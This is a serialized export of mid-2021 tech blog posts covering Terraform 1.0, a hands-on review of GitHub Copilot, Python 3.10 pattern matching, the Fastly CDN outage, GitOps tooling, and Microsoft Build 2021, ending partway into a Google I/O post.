Don\u0026rsquo;t use \u0026gt;= without an upper bound — use ~\u0026gt; to constrain to the minor version.\nInvest in module structure: Stability means your investment in modules has a longer shelf life. If you\u0026rsquo;ve been deferring a refactor of your Terraform code because you were waiting for things to settle down, the settling has happened. Now is the time to build proper module hierarchies, implement consistent tagging strategies, and establish conventions that will last.\nConsider Terraform Cloud or Enterprise: HashiCorp has been steadily improving their hosted offering, and with 1.0 stability, the managed state backend, policy enforcement via Sentinel, and the private module registry become more compelling investments. The free tier of Terraform Cloud covers most small team needs.\nMy Take # I\u0026rsquo;ve watched Terraform grow from a scrappy alternative to CloudFormation into the de facto standard for infrastructure as code. The 1.0 release doesn\u0026rsquo;t change what Terraform is — it\u0026rsquo;s been production-ready for years. What it changes is the implicit contract with users. \u0026ldquo;We will not break your workflow\u0026rdquo; is a powerful promise for a tool that manages critical infrastructure.\nThe thing I appreciate most about how HashiCorp handled this release is the honesty. They didn\u0026rsquo;t rush to 1.0 to hit a marketing milestone. They spent two years in the 0.13-0.15 range, systematically eliminating rough edges and ensuring the upgrade path was smooth. That patience reflects an understanding of how disruptive breaking changes are for infrastructure tooling specifically — unlike application code, you can\u0026rsquo;t just roll back a Terraform upgrade if it breaks your state file.\nFor teams still running 0.12 or earlier: this is your signal to upgrade. The longer you wait, the more painful the migration. For everyone else, enjoy the stability. 
It\u0026rsquo;s been a long time coming.\n","date":"1 July 2021","externalUrl":null,"permalink":"/posts/210701-terraform-1-0-infrastructure-as-code-milestone/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"After years of 0.x releases, Terraform hits 1.0 with stability guarantees. What this means for the IaC ecosystem and your existing workflows.","title":"Terraform 1.0 — Infrastructure as Code Reaches a Milestone","type":"posts"},{"content":"GitHub dropped a bombshell this week. Copilot, their new AI pair programming tool built on OpenAI\u0026rsquo;s Codex model, moved into technical preview. It sits in your VS Code editor and suggests entire functions, code blocks, and algorithms based on comments and context. This represents the next evolution in GitHub\u0026rsquo;s platform consolidation, extending far beyond simple code hosting. I got access to the preview a few days ago, and I\u0026rsquo;ve been alternating between being genuinely impressed and deeply concerned.\nLet me be upfront: this is the most significant change to the developer workflow I\u0026rsquo;ve seen since the introduction of intelligent code completion in IDEs. Whether it\u0026rsquo;s a net positive depends on questions we don\u0026rsquo;t have answers to yet.\nHow It Works # Copilot is powered by OpenAI Codex, a descendant of GPT-3 that\u0026rsquo;s been fine-tuned on publicly available code from GitHub repositories. When you type a comment describing what you want, or start writing a function signature, Copilot generates suggestions for the implementation. It can produce entire functions, handle boilerplate, write tests, and even generate regex patterns from natural language descriptions.\nThe model understands context — it reads the surrounding code, imports, variable names, and comments to produce suggestions that fit your codebase\u0026rsquo;s style. In practice, this means the suggestions get better the more context you provide. 
A well-documented codebase with clear naming conventions gets significantly better suggestions than a greenfield file.\nThe technical implementation is a cloud-based service — your code context is sent to GitHub\u0026rsquo;s servers, processed by the model, and suggestions are returned. This happens in near-real-time as you type, similar to how autocomplete works in Google Docs. The latency is noticeable but not disruptive on a decent connection.\nWhat It Does Well # After several days of use, I\u0026rsquo;m comfortable saying Copilot genuinely excels in specific scenarios.\nBoilerplate and glue code: Writing CRUD operations, setting up HTTP handlers, implementing standard interfaces — Copilot handles these almost perfectly. It\u0026rsquo;s the code you\u0026rsquo;ve written a thousand times, and having an AI generate it from a function signature saves real time.\nLanguage translation: I described an algorithm in a comment and Copilot generated Python implementations that I\u0026rsquo;d estimate were correct about 70% of the time for straightforward algorithms. For utility functions — sorting, string manipulation, date formatting — it\u0026rsquo;s remarkably reliable.\nAPI usage patterns: When working with well-documented libraries like pandas, requests, or Flask, Copilot generates usage patterns that are usually correct and idiomatic. It\u0026rsquo;s essentially distilled the collective patterns of millions of developers who\u0026rsquo;ve used these libraries before you.\nTest generation: Write a function, then start writing a test file for it, and Copilot will suggest test cases that cover common edge cases. 
This was genuinely surprising — it produced test cases I might have missed in a first pass.\nWhere It Falls Short # The failure modes are instructive because they reveal what the model actually is — a very sophisticated pattern matcher, not a reasoning engine.\nComplex business logic: Ask Copilot to implement anything that requires understanding domain-specific rules, and it starts generating plausible-looking but incorrect code. It doesn\u0026rsquo;t understand your business; it understands code patterns. There\u0026rsquo;s a crucial difference.\nSecurity-sensitive code: This is my biggest concern. Copilot will happily generate code with SQL injection vulnerabilities, hardcoded credentials in example patterns, and authentication flows with subtle flaws. It\u0026rsquo;s learned from the vast corpus of GitHub code, and frankly, a lot of that code has security issues. The model reproduces common patterns, including common mistakes.\nSubtle algorithmic errors: For anything beyond standard algorithms, Copilot produces code that looks correct at a glance but has off-by-one errors, incorrect boundary conditions, or wrong assumptions about data types. The code compiles, the happy path works, but the edge cases fail silently.\nThe Legal and Ethical Minefield # Beyond the technical assessment, Copilot raises questions that GitHub hasn\u0026rsquo;t adequately addressed.\nThe model was trained on public GitHub repositories, including those under copyleft licenses like GPL. If Copilot reproduces substantial portions of GPL-licensed code in your proprietary project — and researchers have already shown it can reproduce verbatim snippets — the licensing implications are entirely unclear. GitHub\u0026rsquo;s position appears to be that this constitutes fair use, but that hasn\u0026rsquo;t been tested in court.\nThere\u0026rsquo;s also the question of code ownership. If Copilot generates a function for you, who owns that code? You? GitHub? 
The original authors whose code trained the model? Microsoft\u0026rsquo;s terms of service claim you own the output, but the legal landscape around AI-generated content is unsettled territory.\nFor any organization working on proprietary software, these questions need answers from your legal team before you adopt Copilot broadly. The productivity gains aren\u0026rsquo;t worth a licensing lawsuit.\nThe Code Quality Concern # Here\u0026rsquo;s what worries me most as someone who\u0026rsquo;s spent decades advocating for code quality: Copilot optimizes for code that looks right, not code that is right. The suggestions are syntactically valid and pattern-consistent, but they lack understanding. This echoes broader concerns about code security and supply chain attacks — adding a new vector where subtle vulnerabilities can be introduced through automated tools.\nA junior developer who accepts Copilot suggestions without careful review is going to introduce subtle bugs at a rate that exceeds what they\u0026rsquo;d produce writing code from scratch. At least when you write code yourself, you\u0026rsquo;re forced to think through the logic. Copilot removes that friction, and friction in programming isn\u0026rsquo;t always bad — it\u0026rsquo;s often where understanding happens.\nSenior developers who can critically evaluate every suggestion will benefit most. They have the experience to spot when Copilot\u0026rsquo;s output is subtly wrong. Ironically, the developers who need Copilot least are the ones best equipped to use it.\nMy Take # Copilot is genuinely impressive technology. It\u0026rsquo;s also genuinely dangerous technology if used carelessly. I don\u0026rsquo;t think it\u0026rsquo;s going to replace programmers — not this version, not the next few versions. But it is going to change what programming looks like on a daily basis.\nMy recommendation: if you get access to the preview, use it. 
But use it the way you\u0026rsquo;d use Stack Overflow suggestions — as a starting point that requires validation, not as a source of truth. Review every suggestion. Test the edge cases. And for the love of everything, don\u0026rsquo;t accept security-sensitive code suggestions without thorough review.\nThe era of AI-assisted coding has arrived. How well it goes depends entirely on how disciplined we are about using it. Given this industry\u0026rsquo;s track record with \u0026ldquo;move fast and break things,\u0026rdquo; I\u0026rsquo;m cautiously pessimistic. But I\u0026rsquo;d love to be wrong.\n","date":"24 June 2021","externalUrl":null,"permalink":"/posts/210624-github-copilot-ai-pair-programming/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub’s Copilot uses OpenAI Codex to autocomplete entire functions. After a week with the technical preview, here’s what developers need to understand.","title":"GitHub Copilot — AI Pair Programming Arrives, For Better or Worse","type":"posts"},{"content":"Python 3.10 beta 3 is out, and while the release candidate phase is approaching, one feature has dominated the conversation: structural pattern matching via the new match/case statements (PEP 634, 635, and 636). Having spent the past few weeks experimenting with the beta, I\u0026rsquo;m convinced this is the most consequential addition to Python\u0026rsquo;s syntax since f-strings landed in 3.6 — and possibly since generators in 2.3.\nIf you\u0026rsquo;ve been following the PEP discussions, you know this feature generated significant controversy. Python has always prided itself on \u0026ldquo;one obvious way to do things,\u0026rdquo; and critics argue that pattern matching overlaps with existing if/elif chains. After actually using it, I think they\u0026rsquo;re wrong. Let me explain why.\nBeyond Switch Statements # The most common misconception is that match/case is Python\u0026rsquo;s version of C\u0026rsquo;s switch statement. 
It\u0026rsquo;s not. That framing completely undersells what structural pattern matching brings to the table.\nYes, you can use it for simple value matching:\nmatch status_code:\n    case 200:\n        handle_success()\n    case 404:\n        handle_not_found()\n    case _:\n        handle_other()\nBut that\u0026rsquo;s the least interesting use case. The real power emerges when you match on structure, decomposing complex data types and binding variables in a single, readable statement:\nmatch command:\n    case {\u0026#34;action\u0026#34;: \u0026#34;move\u0026#34;, \u0026#34;direction\u0026#34;: str(d), \u0026#34;distance\u0026#34;: int(n)}:\n        move(d, n)\n    case {\u0026#34;action\u0026#34;: \u0026#34;resize\u0026#34;, \u0026#34;width\u0026#34;: int(w), \u0026#34;height\u0026#34;: int(h)}:\n        resize(w, h)\n    case {\u0026#34;action\u0026#34;: \u0026#34;quit\u0026#34;}:\n        shutdown()\nThis is matching on the shape of a dictionary, extracting typed values, and binding them to variables, all in one statement. Try doing that cleanly with if/elif chains. You\u0026rsquo;ll end up with nested conditionals, isinstance() calls, and temporary variables scattered everywhere.\nWhere Pattern Matching Shines # After working with it for a few weeks, I\u0026rsquo;ve found three areas where pattern matching dramatically improves code quality.\nAST and tree processing: If you work with parsed data structures (JSON APIs, configuration files, compiler internals, DOM-like trees), pattern matching is transformative. 
Walking a tree structure with pattern matching reads almost like a formal grammar specification:\nmatch node:\n    case BinaryOp(left=Expression() as l, op=\u0026#34;+\u0026#34;, right=Literal(value=0)):\n        return l  # x + 0 optimization\n    case BinaryOp(left=Literal(value=0), op=\u0026#34;+\u0026#34;, right=Expression() as r):\n        return r  # 0 + x optimization\n    case BinaryOp(left=l, op=op, right=r):\n        return BinaryOp(optimize(l), op, optimize(r))\nProtocol/message handling: Any system that receives messages with varying structures (network protocols, event-driven architectures, command parsers) benefits enormously. Pattern matching replaces the kind of defensive, shape-checking code that accumulates in these handlers.\nState machines: Matching on (current_state, event) tuples produces state machine implementations that are almost self-documenting:\nmatch (state, event):\n    case (State.IDLE, Event.START):\n        return State.RUNNING\n    case (State.RUNNING, Event.PAUSE):\n        return State.PAUSED\n    case (State.RUNNING, Event.COMPLETE):\n        return State.DONE\nThe Guard Clause Addition # One feature that doesn\u0026rsquo;t get enough attention is guard clauses, the ability to add if conditions to case patterns:\nmatch point:\n    case Point(x, y) if x == y:\n        print(\u0026#34;On the diagonal\u0026#34;)\n    case Point(x, y) if x \u0026gt; 0 and y \u0026gt; 0:\n        print(\u0026#34;First quadrant\u0026#34;)\nGuards bridge the gap between structural matching and conditional logic. Without them, you\u0026rsquo;d still need nested if statements inside case blocks for anything beyond simple structure matching. With them, pattern matching handles the full range of dispatch logic.\nThe Controversy: Is This Pythonic? # The Python community has been divided on this feature. The core argument against it: Python has always been readable to newcomers, and match/case introduces concepts (destructuring, binding, guards) that raise the learning curve.\nI understand the concern, but I think it\u0026rsquo;s misplaced. 
Python already has complex features — list comprehensions, decorators, context managers, async/await. Each one raised the learning curve, and each one made Python a better language because they replaced patterns that were more verbose and error-prone.\nThe real question isn\u0026rsquo;t whether pattern matching is simple — it\u0026rsquo;s whether the code it replaces was simple. And in my experience, the if/elif/isinstance chains that pattern matching replaces are anything but simple. They\u0026rsquo;re just familiar, which isn\u0026rsquo;t the same thing.\nThere\u0026rsquo;s also the \u0026ldquo;soft keyword\u0026rdquo; implementation detail worth noting: match and case are not reserved keywords. They\u0026rsquo;re context-sensitive, meaning existing code that uses match or case as variable names will continue to work. This was a pragmatic decision that avoids breaking existing codebases — the kind of careful backward compatibility that I\u0026rsquo;ve always appreciated about Python\u0026rsquo;s evolution.\nPerformance Considerations # One question I\u0026rsquo;ve been investigating is performance. Pattern matching isn\u0026rsquo;t just syntactic sugar over if/elif — the compiler can potentially optimize the dispatch. In the current beta, the performance is roughly comparable to equivalent if/elif chains for simple cases, and marginally better for complex structural matching because it avoids redundant attribute access.\nThat said, this is beta software, and I expect the CPython team will continue optimizing the bytecode generation for pattern matching in subsequent releases. The important thing is that it\u0026rsquo;s not slower than the alternative, which removes the performance objection.\nMy Take # I\u0026rsquo;ve been writing Python since the 1.5 days, and I\u0026rsquo;ve watched every major syntax addition with a mix of excitement and skepticism. 
Pattern matching earned my enthusiasm faster than most.\nThe key insight is that this feature doesn\u0026rsquo;t add a new way to do something Python could already do easily. It adds a clean way to do something Python could only do clumsily. Destructuring nested data, dispatching on type and structure simultaneously, expressing complex matching logic declaratively — these are all things I\u0026rsquo;ve written ugly code to accomplish for years.\nIf you\u0026rsquo;re on a team that processes structured data, handles heterogeneous messages, or implements anything resembling a protocol parser, start experimenting with the 3.10 beta now. The migration path for existing if/elif dispatch code is straightforward, and the readability improvement is immediate.\nPython 3.10 isn\u0026rsquo;t just an incremental release. Structural pattern matching is a genuine leap forward in how we express logic in Python, and I suspect it\u0026rsquo;ll become as natural as list comprehensions within a couple of years.\n","date":"17 June 2021","externalUrl":null,"permalink":"/posts/210617-python-310-structural-pattern-matching/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.10’s structural pattern matching is the most significant syntax addition since f-strings. Here’s why it matters and where it shines.","title":"Python 3.10 Beta — Structural Pattern Matching Changes Everything","type":"posts"},{"content":"Two days ago, large portions of the internet went dark. Amazon, Reddit, the New York Times, the UK government\u0026rsquo;s gov.uk, Twitch, Stack Overflow — all unreachable. The culprit wasn\u0026rsquo;t a sophisticated cyberattack or a catastrophic hardware failure. It was a single valid configuration change deployed to Fastly\u0026rsquo;s CDN network that triggered an undiscovered software bug. The outage lasted roughly an hour, but the shockwaves will be felt far longer. 
This is exactly the kind of systemic failure scenario that engineers have been warning about for years.\nI\u0026rsquo;ve been working in this industry long enough to remember when we thought putting everything behind a CDN was the ultimate reliability play. And in most cases, it still is. But Tuesday\u0026rsquo;s incident is a stark reminder that abstracting complexity doesn\u0026rsquo;t eliminate it — it concentrates it.\nWhat Actually Happened # Fastly has been refreshingly transparent about the incident. A customer pushed a valid configuration change that triggered a bug in their software, which caused 85% of their network to return errors. Their engineering team identified the issue within minutes, and most services were restored within 49 minutes.\nLet\u0026rsquo;s be clear: a 49-minute detection-to-resolution time is genuinely impressive. Many organizations take longer to acknowledge an incident exists, let alone resolve one affecting global infrastructure. Fastly\u0026rsquo;s engineering team deserves credit for that.\nBut the root cause — a latent bug activated by a routine configuration change — is the kind of failure mode that should make every infrastructure engineer uncomfortable. This wasn\u0026rsquo;t an edge case or an unreasonable input. It was a normal customer action that happened to tickle a code path nobody had tested thoroughly enough.\nThe Concentration Problem # Here\u0026rsquo;s the uncomfortable architectural reality: we\u0026rsquo;ve traded distributed fragility for concentrated fragility. The old internet was unreliable in lots of small ways — individual servers went down, individual sites had issues. The modern internet is reliable almost all the time, but when it fails, it fails spectacularly because so much traffic flows through so few providers. 
The concentration of infrastructure dependencies means that single points of failure have massive blast radius.\nFastly, Cloudflare, and Akamai collectively handle an enormous percentage of web traffic. AWS, Azure, and GCP underpin most of the services behind those CDNs. The dependency graph of the modern internet looks less like a resilient mesh and more like an hourglass — millions of clients on one side, millions of origin servers on the other, and a surprisingly small number of infrastructure providers in the middle.\nI\u0026rsquo;ve had this conversation with clients dozens of times: \u0026ldquo;What\u0026rsquo;s your disaster recovery plan if your CDN goes down?\u0026rdquo; The typical answer is a blank stare. We\u0026rsquo;ve internalized the assumption that these services are essentially utilities — always available, like electricity. But even electricity grids have redundancy built in at multiple levels. Most web architectures have a single CDN provider and no fallback. The lessons apply everywhere: infrastructure resilience requires planning for systemic failures.\nWhat This Means for Architecture Decisions # If you\u0026rsquo;re running anything where availability matters — and let\u0026rsquo;s be honest, that\u0026rsquo;s most things — this outage should prompt some concrete architectural questions:\nMulti-CDN strategies: Running traffic through multiple CDN providers with DNS-level failover is technically feasible but operationally complex. You\u0026rsquo;re managing configuration, cache invalidation, and SSL certificates across multiple platforms. The cost is real, but for critical services, it\u0026rsquo;s worth evaluating. Companies like Citrix (NetScaler) and NS1 offer intelligent DNS routing that can detect CDN failures and redirect traffic.\nOrigin resilience: Can your origin servers handle direct traffic if the CDN layer disappears? 
Many applications have scaled their origin infrastructure based on the assumption that the CDN absorbs 90%+ of the traffic. If that CDN layer vanishes, the origin gets crushed. Load testing without the CDN in the path is an exercise few teams perform but many should.\nGraceful degradation: Could your application serve a reduced experience directly? Static HTML fallback pages, service workers with cached content, progressive enhancement that doesn\u0026rsquo;t depend on a CDN for core functionality — these are patterns that existed before CDNs became ubiquitous, and they\u0026rsquo;re still valuable.\nMonitoring from the outside: If your monitoring infrastructure runs through the same CDN as your production traffic, you might not even know you\u0026rsquo;re down. External monitoring from diverse network paths isn\u0026rsquo;t optional for serious production systems.\nThe Software Bug Angle # Beyond the architectural conversation, there\u0026rsquo;s a software quality story here. Fastly runs Varnish Configuration Language (VCL) that customers can customize extensively. The interaction between customer configurations and the underlying platform software creates a vast state space that\u0026rsquo;s genuinely difficult to test comprehensively.\nThis is a pattern I see repeatedly in platform engineering: the more flexibility you give users, the harder it is to guarantee that every possible combination of valid inputs produces correct behavior. It\u0026rsquo;s the configuration-as-code challenge writ large. Every configuration option multiplies the testing surface. Every customer-facing knob is a potential trigger for an untested interaction.\nFastly will fix this specific bug, undoubtedly. But the class of bug — latent defects triggered by valid configuration changes — is essentially unsolvable through testing alone. 
It requires defense-in-depth: canary deployments for configuration changes, blast radius limitation, circuit breakers that prevent a single bad configuration from propagating globally.\nMy Take # I don\u0026rsquo;t think this outage means you should abandon CDNs or start building everything on bare metal. The reliability gains from CDN infrastructure are real and significant. What it does mean is that we need to stop treating any single infrastructure provider as infallible.\nThe internet was designed to route around damage. Somewhere along the way, we built an application layer that routes everything through the same handful of chokepoints. That\u0026rsquo;s not a CDN problem — it\u0026rsquo;s an architecture problem. And it\u0026rsquo;s one we\u0026rsquo;ve collectively chosen because it\u0026rsquo;s cheaper and simpler than true redundancy.\nFor most of my clients, the pragmatic takeaway is this: understand your CDN dependency, have a documented (and tested) plan for when it fails, and make sure your monitoring can actually detect the failure. That won\u0026rsquo;t prevent the next outage, but it\u0026rsquo;ll make the difference between a 49-minute inconvenience and a 49-minute crisis.\nThe internet isn\u0026rsquo;t as resilient as we like to pretend. 
Tuesday made that impossible to ignore.\n","date":"10 June 2021","externalUrl":null,"permalink":"/posts/210610-fastly-cdn-outage-single-points-failure/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"When a single configuration change at Fastly took down half the internet, it exposed uncomfortable truths about how we build on CDN infrastructure.","title":"The Fastly Outage — A Masterclass in Single Points of Failure","type":"posts"},{"content":"The CNCF (Cloud Native Computing Foundation) recently accepted Argo into its incubation stage — and while the formal announcement was back in March, the implications are really sinking in now as the ecosystem coalesces around GitOps as a standard deployment paradigm. Combined with Flux v2 reaching production readiness and the formation of the GitOps Working Group under the CNCF\u0026rsquo;s App Delivery TAG, we\u0026rsquo;re watching GitOps transition from a trendy concept to an industry standard. This complements the Kubernetes 1.21 maturation where the platform itself is stabilizing into production-ready form.\nWhat GitOps Actually Means (and Doesn\u0026rsquo;t) # GitOps, a term coined by Weaveworks back in 2017, boils down to a deceptively simple principle: Git is the single source of truth for your infrastructure and application state. Your desired state lives in a Git repository, and an automated process continuously reconciles the actual state of your system with what\u0026rsquo;s declared in Git.\nThis sounds obvious, and many teams think they\u0026rsquo;re already doing GitOps because they store their Kubernetes manifests in Git and have a CI pipeline that runs kubectl apply. But there\u0026rsquo;s a crucial distinction between CI-driven deployment (push-based) and true GitOps (pull-based).\nIn CI-driven deployment, your CI pipeline pushes changes to your cluster. 
The pipeline needs cluster credentials, the deployment happens imperatively, and if someone manually changes something in the cluster, there\u0026rsquo;s no mechanism to detect or correct the drift.\nIn a GitOps model, an agent inside the cluster (ArgoCD, Flux) continuously watches the Git repository and pulls changes. If the cluster state drifts from what\u0026rsquo;s in Git — whether through manual changes, failed deployments, or infrastructure issues — the agent automatically reconciles back to the desired state. This is the fundamental shift: from \u0026ldquo;deploy and hope\u0026rdquo; to \u0026ldquo;declare and converge.\u0026rdquo; This declarative approach mirrors Terraform\u0026rsquo;s infrastructure-as-code philosophy.\nArgoCD: Why It\u0026rsquo;s Winning Hearts # I\u0026rsquo;ve been running ArgoCD in production for about eight months now, and it\u0026rsquo;s earned every bit of its growing popularity. The project has over 7,000 GitHub stars and is used in production by organizations ranging from startups to enterprises like Intuit (where the Argo project originated).\nWhat makes ArgoCD compelling as a GitOps operator:\nThe UI is genuinely useful. Unlike many Kubernetes tools where the dashboard is an afterthought, ArgoCD\u0026rsquo;s web interface provides real-time visualization of your application\u0026rsquo;s resource tree, sync status, and health. When a deployment goes wrong, you can see exactly which resource failed and why, without switching to a terminal.\nMulti-cluster management works well. We manage four clusters through a single ArgoCD instance, and the experience is clean. Each application declares its target cluster, and ArgoCD handles the rest. This is invaluable for organizations running separate staging, production, and regional clusters.\nThe Application CRD model is elegant. You define an ArgoCD Application that points to a Git repository path and a target cluster/namespace. That\u0026rsquo;s it. 
ArgoCD handles sync, health checking, pruning of removed resources, and rollback. The ApplicationSet controller extends this further, allowing you to template applications across multiple clusters or environments from a single definition.\nHelm and Kustomize integration is first-class. ArgoCD natively understands Helm charts and Kustomize overlays, which means you don\u0026rsquo;t have to pre-render your templates in CI. It renders at sync time, so the Git repository contains the actual source templates rather than rendered output.\nFlux v2: The Composable Alternative # While ArgoCD takes a monolithic approach (one tool that does everything), Flux v2 takes a deliberately composable approach built on a set of specialized controllers:\nSource Controller watches Git repos, Helm repos, and S3 buckets Kustomize Controller handles Kustomize-based reconciliation Helm Controller manages Helm releases Notification Controller handles alerts and webhooks Image Automation Controllers can automatically update image tags in Git This composability means you can use only the pieces you need. If you\u0026rsquo;re pure Kustomize, you don\u0026rsquo;t need the Helm controller. If you want automated image updates (a controversial feature that ArgoCD deliberately doesn\u0026rsquo;t include by default), Flux has purpose-built controllers for it.\nFlux v2 is also built entirely on Kubernetes APIs using custom resources, which means standard Kubernetes tooling (kubectl, RBAC, audit logs) works naturally with it. There\u0026rsquo;s no separate API server or UI to manage — it\u0026rsquo;s Kubernetes-native through and through.\nThe GitOps Working Group and Standardization # Perhaps the most consequential development is the GitOps Working Group effort to create a vendor-neutral definition and set of principles for GitOps. 
The working group includes contributors from Weaveworks (Flux), Intuit/Codefresh (Argo), Microsoft, AWS, and others.\nHaving a shared definition matters because \u0026ldquo;GitOps\u0026rdquo; has become a marketing term that gets slapped on anything involving Git and deployment. A formal set of principles helps the community distinguish genuine GitOps implementations from CI/CD pipelines with a Git trigger.\nThe draft principles emphasize four key aspects: declarative desired state, versioned and immutable state in Git, automated agents that pull and apply changes, and continuous reconciliation with drift detection. If your deployment process doesn\u0026rsquo;t include all four, it\u0026rsquo;s not GitOps — it\u0026rsquo;s just CI/CD with Git, which is fine, but it\u0026rsquo;s a different thing.\nMy Take # After running ArgoCD in production and evaluating Flux v2, my recommendation for teams getting started with GitOps is straightforward: if you want a batteries-included solution with a great UI, choose ArgoCD. If you prefer a composable, Kubernetes-native toolkit and don\u0026rsquo;t need a web interface, choose Flux. Both are excellent, both are CNCF-backed, and both will serve you well.\nThe more important decision is whether to adopt GitOps at all, and I\u0026rsquo;d argue that for any team running more than a handful of services on Kubernetes, the answer is yes. The benefits are substantial: auditable deployment history through Git commits, automatic drift detection and correction, easier disaster recovery (just point the agent at the Git repo), and a deployment process that doesn\u0026rsquo;t require sharing cluster credentials with your CI system.\nWe\u0026rsquo;re past the \u0026ldquo;early adopter\u0026rdquo; phase for GitOps. The tooling is mature, the community is vibrant, and the CNCF\u0026rsquo;s investment signals long-term sustainability. 
If you\u0026rsquo;re still doing imperative kubectl apply from CI pipelines, now is a good time to make the switch.\n","date":"3 June 2021","externalUrl":null,"permalink":"/posts/210603-gitops-argocd-cncf-incubation/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"With ArgoCD accepted into CNCF incubation and Flux reaching its own milestones, GitOps is transitioning from buzzword to standard practice for Kubernetes deployments.","title":"GitOps Goes Mainstream — ArgoCD, Flux, and the CNCF Bet","type":"posts"},{"content":"Microsoft Build wrapped up yesterday, and if there\u0026rsquo;s a single thread running through this year\u0026rsquo;s announcements, it\u0026rsquo;s this: Microsoft is systematically building the most integrated developer platform in the industry. From Azure to GitHub to VS Code to the underlying infrastructure, the pieces are fitting together in ways that should make both developers and competitors pay close attention.\nAzure\u0026rsquo;s Cloud-Native Push # The Azure announcements at Build were heavily focused on cloud-native development. Azure Container Apps — well, the early hints of what\u0026rsquo;s coming in that direction — point toward making container deployment dramatically simpler. The goal appears to be offering something between the full complexity of AKS (Azure Kubernetes Service) and the limitations of Azure Functions: a way to run containerized workloads without managing Kubernetes clusters yourself.\nMore practically relevant for many developers is the continued evolution of Azure Static Web Apps, which is now generally available. It\u0026rsquo;s a smart product that integrates static site hosting, serverless API backends, CI/CD through GitHub Actions, and authentication into a single service. 
I\u0026rsquo;ve been using it for a few side projects, and the developer experience is genuinely smooth — push to GitHub, and your site deploys automatically with a preview URL for pull requests.\nThe Azure Arc expansion was also significant. Arc is Microsoft\u0026rsquo;s hybrid and multi-cloud management layer, and the new capabilities around running Azure services on any Kubernetes cluster — including on-premises and on competing clouds — represent a serious strategic play. If you can run Azure SQL, Azure App Services, and Azure ML on your own infrastructure managed through the Azure control plane, the boundary between \u0026ldquo;Azure\u0026rdquo; and \u0026ldquo;not Azure\u0026rdquo; starts to blur in interesting ways.\nGitHub and the Inner Loop # The GitHub announcements were where Build got really interesting for my daily workflow. GitHub Copilot — the AI pair programmer built on OpenAI Codex — was the headline grabber. It\u0026rsquo;s currently in limited technical preview, and the demos showed it suggesting entire function implementations, test cases, and even documentation based on context and comments.\nI haven\u0026rsquo;t gotten access yet, so I\u0026rsquo;ll reserve detailed judgment. But the concept is compelling: rather than AI replacing developers, it acts as an autocomplete system that understands code context at a much deeper level than existing tools. The training data (public GitHub repositories) raises questions about licensing and attribution that the community will need to work through, but the potential productivity impact is enormous.\nBeyond Copilot, GitHub Codespaces going generally available is arguably the more impactful announcement for day-to-day development. Full VS Code development environments running in the cloud, preconfigured per repository through devcontainer.json, accessible from any browser. I\u0026rsquo;ve been using Codespaces in beta for months, and it\u0026rsquo;s changed how I think about development environments. 
No more \u0026ldquo;works on my machine\u0026rdquo; — the development environment is defined in code and runs identically for every contributor.\nThe combination of Codespaces for development, Actions for CI/CD, and Copilot for coding assistance gives GitHub a remarkably complete developer workflow. Add Packages for artifact management and the security features (Dependabot, code scanning, secret scanning), and Microsoft has assembled something that\u0026rsquo;s hard to match.\nPower Platform and the Low-Code Angle # Build also featured heavy investment in Power Platform, Microsoft\u0026rsquo;s low-code development suite. This is an area where I have mixed feelings. Power Apps and Power Automate are genuinely useful for certain categories of business applications — internal tools, workflow automation, data collection forms — that would otherwise either not get built or consume developer time on low-value work.\nThe new Power Fx language, based on Excel formula syntax, is an interesting choice. Given that hundreds of millions of people already know Excel formulas, building a programming language on that foundation makes a kind of pragmatic sense even if it makes language purists uncomfortable.\nWhere I get cautious is when organizations start building critical business logic in low-code platforms. The governance, testing, and maintenance challenges of low-code applications at scale are real and often underestimated. But as a complement to professional development rather than a replacement for it, Power Platform fills a legitimate gap.\n.NET 6 Preview and the Performance Story # The .NET 6 previews shown at Build continued the impressive performance trajectory. Hot reload for both ASP.NET Core and MAUI (the cross-platform UI framework replacing Xamarin.Forms) is a quality-of-life improvement that modern developers expect. 
The Minimal APIs feature in ASP.NET Core reduces the boilerplate for simple web APIs to just a few lines of code, bringing .NET closer to the simplicity of Express.js or Flask for straightforward services.\nThe performance benchmarks are genuinely impressive. .NET continues to dominate the TechEmpower framework benchmarks, and .NET 6 is pushing the numbers even further. For anyone who still thinks of .NET as the slow, Windows-only enterprise framework of the 2000s, it\u0026rsquo;s worth revisiting those assumptions.\nMy Take # Microsoft\u0026rsquo;s strategy is becoming clearer with each Build conference: own the developer platform end-to-end. Azure for infrastructure, GitHub for code and collaboration, VS Code for editing, .NET for the runtime, and AI for assistance. Each piece reinforces the others, and the integration points are getting smoother every year.\nWhat impresses me most is that they\u0026rsquo;re doing this while remaining genuinely open. VS Code is open source. .NET is open source. GitHub supports every language and framework. Azure runs Linux better than Windows in many scenarios. This isn\u0026rsquo;t the Microsoft of 2001 — it\u0026rsquo;s a company that understood, eventually, that developers choose platforms based on capability and openness, not vendor mandate.\nThe risk, of course, is that this integrated platform becomes a walled garden over time. But for now, the developer experience improvements are real, and competition from AWS and Google keeps everyone honest. 
If you haven\u0026rsquo;t looked at the Microsoft developer ecosystem recently, Build 2021 is a good reason to take another look.\n","date":"27 May 2021","externalUrl":null,"permalink":"/posts/210527-microsoft-build-2021-developer-platform/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft Build 2021 doubled down on the developer platform strategy with Azure improvements, deeper GitHub integration, and a clearer vision for the cloud-native developer workflow.","title":"Microsoft Build 2021 — The Developer Platform Play Deepens","type":"posts"},{"content":"Google I/O returned this week after skipping 2020 entirely, and the AI announcements were, for once, more substance than spectacle. Don\u0026rsquo;t get me wrong — there were still the obligatory jaw-dropping demos (LaMDA having a conversation as Pluto was certainly a moment). But what caught my attention as a developer were the practical, unglamorous improvements that actually make AI more usable in production systems. This platform strategy mirrors what Microsoft is doing with Azure and broader cloud consolidation trends.\nTensorFlow Gets Serious About the Full Lifecycle # The TensorFlow announcements at I/O focused heavily on what happens after you train a model. TensorFlow Decision Forests brings gradient boosted trees and random forests into the TensorFlow ecosystem, which is significant because not every ML problem needs a neural network. Sometimes a well-tuned gradient boosted model outperforms a deep learning approach, trains in minutes instead of hours, and is far easier to explain to stakeholders.\nThere\u0026rsquo;s also the continued investment in TFX (TensorFlow Extended) for production ML pipelines. The gap between \u0026ldquo;model works in a Jupyter notebook\u0026rdquo; and \u0026ldquo;model runs reliably in production\u0026rdquo; has always been massive, and TFX is one 